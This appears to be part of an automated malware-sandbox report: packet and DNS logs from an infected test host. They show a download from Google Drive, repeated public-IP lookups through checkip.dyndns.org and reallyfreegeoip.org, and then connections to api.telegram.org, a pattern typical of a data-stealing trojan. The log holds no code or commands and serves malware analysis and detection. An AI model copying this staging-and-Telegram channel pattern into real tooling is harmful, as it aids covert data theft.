Dec 24, 2024 11:28:24.816843987 CET	443	49866	142.250.181.1	192.168.2.9
Dec 24, 2024 11:28:24.816888094 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:24.819772005 CET	443	49866	142.250.181.1	192.168.2.9
Dec 24, 2024 11:28:24.819817066 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:24.819890976 CET	443	49866	142.250.181.1	192.168.2.9
Dec 24, 2024 11:28:24.819955111 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:24.823165894 CET	443	49866	142.250.181.1	192.168.2.9
Dec 24, 2024 11:28:24.823209047 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:24.823254108 CET	443	49866	142.250.181.1	192.168.2.9
Dec 24, 2024 11:28:24.823297024 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:24.826385021 CET	443	49866	142.250.181.1	192.168.2.9
Dec 24, 2024 11:28:24.826438904 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:24.826451063 CET	443	49866	142.250.181.1	192.168.2.9
Dec 24, 2024 11:28:24.826488972 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:24.829917908 CET	443	49866	142.250.181.1	192.168.2.9
Dec 24, 2024 11:28:24.829966068 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:24.830040932 CET	443	49866	142.250.181.1	192.168.2.9
Dec 24, 2024 11:28:24.830086946 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:24.832762003 CET	443	49866	142.250.181.1	192.168.2.9
Dec 24, 2024 11:28:24.832814932 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:24.832937002 CET	443	49866	142.250.181.1	192.168.2.9
Dec 24, 2024 11:28:24.832987070 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:24.835721016 CET	443	49866	142.250.181.1	192.168.2.9
Dec 24, 2024 11:28:24.835764885 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:24.835849047 CET	443	49866	142.250.181.1	192.168.2.9
Dec 24, 2024 11:28:24.835937977 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:24.838778973 CET	443	49866	142.250.181.1	192.168.2.9
Dec 24, 2024 11:28:24.838829994 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:24.838836908 CET	443	49866	142.250.181.1	192.168.2.9
Dec 24, 2024 11:28:24.838880062 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:24.838887930 CET	443	49866	142.250.181.1	192.168.2.9
Dec 24, 2024 11:28:24.838927031 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:24.839320898 CET	443	49866	142.250.181.1	192.168.2.9
Dec 24, 2024 11:28:24.839366913 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:24.841944933 CET	443	49866	142.250.181.1	192.168.2.9
Dec 24, 2024 11:28:24.841993093 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:24.842344999 CET	443	49866	142.250.181.1	192.168.2.9
Dec 24, 2024 11:28:24.842391014 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:24.845217943 CET	443	49866	142.250.181.1	192.168.2.9
Dec 24, 2024 11:28:24.845292091 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:24.845844030 CET	443	49866	142.250.181.1	192.168.2.9
Dec 24, 2024 11:28:24.845896959 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:24.848048925 CET	443	49866	142.250.181.1	192.168.2.9
Dec 24, 2024 11:28:24.848093987 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:24.848417997 CET	443	49866	142.250.181.1	192.168.2.9
Dec 24, 2024 11:28:24.848467112 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:24.850923061 CET	443	49866	142.250.181.1	192.168.2.9
Dec 24, 2024 11:28:24.850976944 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:24.851460934 CET	443	49866	142.250.181.1	192.168.2.9
Dec 24, 2024 11:28:24.851505995 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:24.856040955 CET	443	49866	142.250.181.1	192.168.2.9
Dec 24, 2024 11:28:24.856096983 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:24.856482029 CET	443	49866	142.250.181.1	192.168.2.9
Dec 24, 2024 11:28:24.856533051 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:24.861480951 CET	443	49866	142.250.181.1	192.168.2.9
Dec 24, 2024 11:28:24.861540079 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:24.861627102 CET	443	49866	142.250.181.1	192.168.2.9
Dec 24, 2024 11:28:24.861685038 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:24.861985922 CET	443	49866	142.250.181.1	192.168.2.9
Dec 24, 2024 11:28:24.862054110 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:24.862070084 CET	443	49866	142.250.181.1	192.168.2.9
Dec 24, 2024 11:28:24.862123966 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:24.862148046 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:24.862209082 CET	443	49866	142.250.181.1	192.168.2.9
Dec 24, 2024 11:28:24.862263918 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:25.231539011 CET	49881	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:25.351062059 CET	80	49881	193.122.6.168	192.168.2.9
Dec 24, 2024 11:28:25.351134062 CET	49881	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:25.351393938 CET	49881	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:25.471189022 CET	80	49881	193.122.6.168	192.168.2.9
Dec 24, 2024 11:28:26.620445967 CET	80	49881	193.122.6.168	192.168.2.9
Dec 24, 2024 11:28:26.623927116 CET	49881	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:26.745008945 CET	80	49881	193.122.6.168	192.168.2.9
Dec 24, 2024 11:28:27.031100988 CET	80	49881	193.122.6.168	192.168.2.9
Dec 24, 2024 11:28:27.076023102 CET	49881	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:27.447448969 CET	49887	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:27.447510004 CET	443	49887	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:27.447582006 CET	49887	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:27.449393988 CET	49887	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:27.449431896 CET	443	49887	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:28.672730923 CET	443	49887	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:28.672852039 CET	49887	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:28.676356077 CET	49887	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:28.676363945 CET	443	49887	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:28.676655054 CET	443	49887	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:28.679932117 CET	49887	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:28.723355055 CET	443	49887	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:29.115222931 CET	443	49887	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:29.115278006 CET	443	49887	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:29.115350008 CET	49887	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:29.126513958 CET	49887	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:29.132431030 CET	49881	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:29.252180099 CET	80	49881	193.122.6.168	192.168.2.9
Dec 24, 2024 11:28:29.537750006 CET	80	49881	193.122.6.168	192.168.2.9
Dec 24, 2024 11:28:29.539800882 CET	49893	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:29.539839029 CET	443	49893	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:29.539897919 CET	49893	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:29.540249109 CET	49893	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:29.540261984 CET	443	49893	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:29.591650009 CET	49881	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:30.754570961 CET	443	49893	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:30.756648064 CET	49893	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:30.756666899 CET	443	49893	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:31.203032017 CET	443	49893	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:31.203105927 CET	443	49893	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:31.203150988 CET	49893	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:31.203536987 CET	49893	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:31.206588984 CET	49881	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:31.207463980 CET	49898	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:31.326450109 CET	80	49881	193.122.6.168	192.168.2.9
Dec 24, 2024 11:28:31.326522112 CET	49881	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:31.327066898 CET	80	49898	193.122.6.168	192.168.2.9
Dec 24, 2024 11:28:31.327145100 CET	49898	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:31.327245951 CET	49898	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:31.446647882 CET	80	49898	193.122.6.168	192.168.2.9
Dec 24, 2024 11:28:32.596045971 CET	80	49898	193.122.6.168	192.168.2.9
Dec 24, 2024 11:28:32.597490072 CET	49901	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:32.597537041 CET	443	49901	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:32.597649097 CET	49901	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:32.597892046 CET	49901	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:32.597904921 CET	443	49901	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:32.638537884 CET	49898	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:33.810075045 CET	443	49901	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:33.811923027 CET	49901	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:33.811973095 CET	443	49901	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:34.259676933 CET	443	49901	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:34.259737968 CET	443	49901	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:34.259793043 CET	49901	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:34.260206938 CET	49901	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:34.263442039 CET	49898	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:34.264547110 CET	49907	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:34.383342028 CET	80	49898	193.122.6.168	192.168.2.9
Dec 24, 2024 11:28:34.383455038 CET	49898	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:34.384062052 CET	80	49907	193.122.6.168	192.168.2.9
Dec 24, 2024 11:28:34.384129047 CET	49907	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:34.384279013 CET	49907	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:34.503674030 CET	80	49907	193.122.6.168	192.168.2.9
Dec 24, 2024 11:28:35.653840065 CET	80	49907	193.122.6.168	192.168.2.9
Dec 24, 2024 11:28:35.655107975 CET	49912	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:35.655148029 CET	443	49912	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:35.655448914 CET	49912	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:35.655448914 CET	49912	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:35.655484915 CET	443	49912	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:35.701052904 CET	49907	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:36.865530014 CET	443	49912	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:36.867686033 CET	49912	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:36.867697001 CET	443	49912	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:37.311718941 CET	443	49912	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:37.311786890 CET	443	49912	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:37.311860085 CET	49912	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:37.312705040 CET	49912	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:37.317074060 CET	49917	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:37.436578035 CET	80	49917	193.122.6.168	192.168.2.9
Dec 24, 2024 11:28:37.436695099 CET	49917	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:37.436908007 CET	49917	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:37.556375980 CET	80	49917	193.122.6.168	192.168.2.9
Dec 24, 2024 11:28:38.704668999 CET	80	49917	193.122.6.168	192.168.2.9
Dec 24, 2024 11:28:38.705920935 CET	49920	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:38.705961943 CET	443	49920	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:38.706036091 CET	49920	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:38.706362963 CET	49920	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:38.706377983 CET	443	49920	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:38.747951984 CET	49917	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:39.917886019 CET	443	49920	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:39.920335054 CET	49920	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:39.920358896 CET	443	49920	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:40.365830898 CET	443	49920	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:40.365894079 CET	443	49920	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:40.366004944 CET	49920	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:40.366437912 CET	49920	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:40.369693995 CET	49917	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:40.370208979 CET	49925	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:40.489382982 CET	80	49917	193.122.6.168	192.168.2.9
Dec 24, 2024 11:28:40.489463091 CET	49917	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:40.489638090 CET	80	49925	193.122.6.168	192.168.2.9
Dec 24, 2024 11:28:40.489732981 CET	49925	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:40.489877939 CET	49925	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:40.609304905 CET	80	49925	193.122.6.168	192.168.2.9
Dec 24, 2024 11:28:41.757795095 CET	80	49925	193.122.6.168	192.168.2.9
Dec 24, 2024 11:28:41.758887053 CET	49930	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:41.758936882 CET	443	49930	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:41.759038925 CET	49930	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:41.759248972 CET	49930	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:41.759265900 CET	443	49930	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:41.810587883 CET	49925	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:42.969897032 CET	443	49930	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:42.971481085 CET	49930	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:42.971504927 CET	443	49930	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:43.419576883 CET	443	49930	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:43.419651985 CET	443	49930	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:43.419709921 CET	49930	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:43.420238018 CET	49930	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:43.423517942 CET	49925	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:43.424500942 CET	49933	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:43.543644905 CET	80	49925	193.122.6.168	192.168.2.9
Dec 24, 2024 11:28:43.544172049 CET	80	49933	193.122.6.168	192.168.2.9
Dec 24, 2024 11:28:43.544284105 CET	49925	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:43.544323921 CET	49933	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:43.544482946 CET	49933	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:43.663909912 CET	80	49933	193.122.6.168	192.168.2.9
Dec 24, 2024 11:28:44.820162058 CET	80	49933	193.122.6.168	192.168.2.9
Dec 24, 2024 11:28:44.837510109 CET	49938	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:44.837546110 CET	443	49938	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:44.837610960 CET	49938	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:44.841272116 CET	49938	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:44.841305017 CET	443	49938	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:44.872970104 CET	49933	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:46.054657936 CET	443	49938	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:46.056355953 CET	49938	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:46.056390047 CET	443	49938	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:46.508259058 CET	443	49938	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:46.508336067 CET	443	49938	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:46.508477926 CET	49938	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:46.509095907 CET	49938	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:46.512276888 CET	49933	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:46.513087034 CET	49944	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:46.632074118 CET	80	49933	193.122.6.168	192.168.2.9
Dec 24, 2024 11:28:46.632159948 CET	49933	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:46.632551908 CET	80	49944	193.122.6.168	192.168.2.9
Dec 24, 2024 11:28:46.632723093 CET	49944	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:46.632821083 CET	49944	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:46.752306938 CET	80	49944	193.122.6.168	192.168.2.9
Dec 24, 2024 11:28:47.898505926 CET	80	49944	193.122.6.168	192.168.2.9
Dec 24, 2024 11:28:47.899524927 CET	49947	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:47.899545908 CET	443	49947	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:47.899614096 CET	49947	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:47.899805069 CET	49947	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:47.899818897 CET	443	49947	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:47.951133013 CET	49944	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:49.109750032 CET	443	49947	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:49.111366034 CET	49947	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:49.111392975 CET	443	49947	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:49.552397966 CET	443	49947	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:49.552469015 CET	443	49947	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:49.552544117 CET	49947	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:49.552901030 CET	49947	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:49.555380106 CET	49944	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:49.556308031 CET	49952	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:49.675168037 CET	80	49944	193.122.6.168	192.168.2.9
Dec 24, 2024 11:28:49.675278902 CET	49944	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:49.675760031 CET	80	49952	193.122.6.168	192.168.2.9
Dec 24, 2024 11:28:49.675836086 CET	49952	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:49.675983906 CET	49952	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:49.795618057 CET	80	49952	193.122.6.168	192.168.2.9
Dec 24, 2024 11:28:50.945177078 CET	80	49952	193.122.6.168	192.168.2.9
Dec 24, 2024 11:28:50.946748018 CET	49957	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:50.946780920 CET	443	49957	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:50.946871996 CET	49957	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:50.947107077 CET	49957	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:50.947119951 CET	443	49957	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:50.997957945 CET	49952	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:52.157044888 CET	443	49957	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:52.158543110 CET	49957	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:52.158565998 CET	443	49957	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:52.603935957 CET	443	49957	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:52.604008913 CET	443	49957	172.67.177.134	192.168.2.9
Dec 24, 2024 11:28:52.604130983 CET	49957	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:52.604561090 CET	49957	443	192.168.2.9	172.67.177.134
Dec 24, 2024 11:28:52.632395983 CET	49952	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:52.753797054 CET	80	49952	193.122.6.168	192.168.2.9
Dec 24, 2024 11:28:52.753863096 CET	49952	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:28:52.773067951 CET	49962	443	192.168.2.9	149.154.167.220
Dec 24, 2024 11:28:52.773094893 CET	443	49962	149.154.167.220	192.168.2.9
Dec 24, 2024 11:28:52.773170948 CET	49962	443	192.168.2.9	149.154.167.220
Dec 24, 2024 11:28:52.773569107 CET	49962	443	192.168.2.9	149.154.167.220
Dec 24, 2024 11:28:52.773581982 CET	443	49962	149.154.167.220	192.168.2.9
Dec 24, 2024 11:28:54.143176079 CET	443	49962	149.154.167.220	192.168.2.9
Dec 24, 2024 11:28:54.143336058 CET	49962	443	192.168.2.9	149.154.167.220
Dec 24, 2024 11:28:54.145045042 CET	49962	443	192.168.2.9	149.154.167.220
Dec 24, 2024 11:28:54.145050049 CET	443	49962	149.154.167.220	192.168.2.9
Dec 24, 2024 11:28:54.145277023 CET	443	49962	149.154.167.220	192.168.2.9
Dec 24, 2024 11:28:54.146734953 CET	49962	443	192.168.2.9	149.154.167.220
Dec 24, 2024 11:28:54.187339067 CET	443	49962	149.154.167.220	192.168.2.9
Dec 24, 2024 11:28:54.646500111 CET	443	49962	149.154.167.220	192.168.2.9
Dec 24, 2024 11:28:54.646573067 CET	443	49962	149.154.167.220	192.168.2.9
Dec 24, 2024 11:28:54.646627903 CET	49962	443	192.168.2.9	149.154.167.220
Dec 24, 2024 11:28:54.648787975 CET	49962	443	192.168.2.9	149.154.167.220
Dec 24, 2024 11:29:00.345232964 CET	49907	80	192.168.2.9	193.122.6.168
Dec 24, 2024 11:29:00.556015015 CET	49980	443	192.168.2.9	149.154.167.220
Dec 24, 2024 11:29:00.556056976 CET	443	49980	149.154.167.220	192.168.2.9
Dec 24, 2024 11:29:00.556140900 CET	49980	443	192.168.2.9	149.154.167.220
Dec 24, 2024 11:29:00.556418896 CET	49980	443	192.168.2.9	149.154.167.220
Dec 24, 2024 11:29:00.556433916 CET	443	49980	149.154.167.220	192.168.2.9
Dec 24, 2024 11:29:01.921160936 CET	443	49980	149.154.167.220	192.168.2.9
Dec 24, 2024 11:29:01.923190117 CET	49980	443	192.168.2.9	149.154.167.220
Dec 24, 2024 11:29:01.923237085 CET	443	49980	149.154.167.220	192.168.2.9
Dec 24, 2024 11:29:01.923335075 CET	49980	443	192.168.2.9	149.154.167.220
Dec 24, 2024 11:29:01.923362017 CET	443	49980	149.154.167.220	192.168.2.9
Dec 24, 2024 11:29:02.477536917 CET	443	49980	149.154.167.220	192.168.2.9
Dec 24, 2024 11:29:02.477617025 CET	443	49980	149.154.167.220	192.168.2.9
Dec 24, 2024 11:29:02.477716923 CET	49980	443	192.168.2.9	149.154.167.220
Dec 24, 2024 11:29:02.478176117 CET	49980	443	192.168.2.9	149.154.167.220
Dec 24, 2024 11:29:04.052860022 CET	49990	443	192.168.2.9	149.154.167.220
Dec 24, 2024 11:29:04.052911043 CET	443	49990	149.154.167.220	192.168.2.9
Dec 24, 2024 11:29:04.052978039 CET	49990	443	192.168.2.9	149.154.167.220
Dec 24, 2024 11:29:04.053221941 CET	49990	443	192.168.2.9	149.154.167.220
Dec 24, 2024 11:29:04.053231001 CET	443	49990	149.154.167.220	192.168.2.9
Dec 24, 2024 11:29:05.420406103 CET	443	49990	149.154.167.220	192.168.2.9
Dec 24, 2024 11:29:05.422550917 CET	49990	443	192.168.2.9	149.154.167.220
Dec 24, 2024 11:29:05.422568083 CET	443	49990	149.154.167.220	192.168.2.9
Dec 24, 2024 11:29:05.422652006 CET	49990	443	192.168.2.9	149.154.167.220
Dec 24, 2024 11:29:05.422657967 CET	443	49990	149.154.167.220	192.168.2.9
Dec 24, 2024 11:29:06.176404953 CET	443	49990	149.154.167.220	192.168.2.9
Dec 24, 2024 11:29:06.176491022 CET	443	49990	149.154.167.220	192.168.2.9
Dec 24, 2024 11:29:06.176635981 CET	49990	443	192.168.2.9	149.154.167.220
Dec 24, 2024 11:29:06.177133083 CET	49990	443	192.168.2.9	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 24, 2024 11:28:16.445419073 CET	53855	53	192.168.2.9	1.1.1.1
Dec 24, 2024 11:28:16.583628893 CET	53	53855	1.1.1.1	192.168.2.9
Dec 24, 2024 11:28:19.219247103 CET	63572	53	192.168.2.9	1.1.1.1
Dec 24, 2024 11:28:19.364240885 CET	53	63572	1.1.1.1	192.168.2.9
Dec 24, 2024 11:28:25.087977886 CET	51732	53	192.168.2.9	1.1.1.1
Dec 24, 2024 11:28:25.226165056 CET	53	51732	1.1.1.1	192.168.2.9
Dec 24, 2024 11:28:27.306672096 CET	51707	53	192.168.2.9	1.1.1.1
Dec 24, 2024 11:28:27.446676970 CET	53	51707	1.1.1.1	192.168.2.9
Dec 24, 2024 11:28:52.633009911 CET	53522	53	192.168.2.9	1.1.1.1
Dec 24, 2024 11:28:52.772417068 CET	53	53522	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 24, 2024 11:28:16.445419073 CET	192.168.2.9	1.1.1.1	0xb2c1	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Dec 24, 2024 11:28:19.219247103 CET	192.168.2.9	1.1.1.1	0xa32b	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Dec 24, 2024 11:28:25.087977886 CET	192.168.2.9	1.1.1.1	0x3941	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Dec 24, 2024 11:28:27.306672096 CET	192.168.2.9	1.1.1.1	0xa69c	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Dec 24, 2024 11:28:52.633009911 CET	192.168.2.9	1.1.1.1	0x1691	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 24, 2024 11:27:03.500042915 CET	1.1.1.1	192.168.2.9	0xaec7	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 24, 2024 11:27:03.500042915 CET	1.1.1.1	192.168.2.9	0xaec7	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 24, 2024 11:28:16.583628893 CET	1.1.1.1	192.168.2.9	0xb2c1	No error (0)	drive.google.com		172.217.19.238	A (IP address)	IN (0x0001)	false
Dec 24, 2024 11:28:19.364240885 CET	1.1.1.1	192.168.2.9	0xa32b	No error (0)	drive.usercontent.google.com		142.250.181.1	A (IP address)	IN (0x0001)	false
Dec 24, 2024 11:28:25.226165056 CET	1.1.1.1	192.168.2.9	0x3941	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
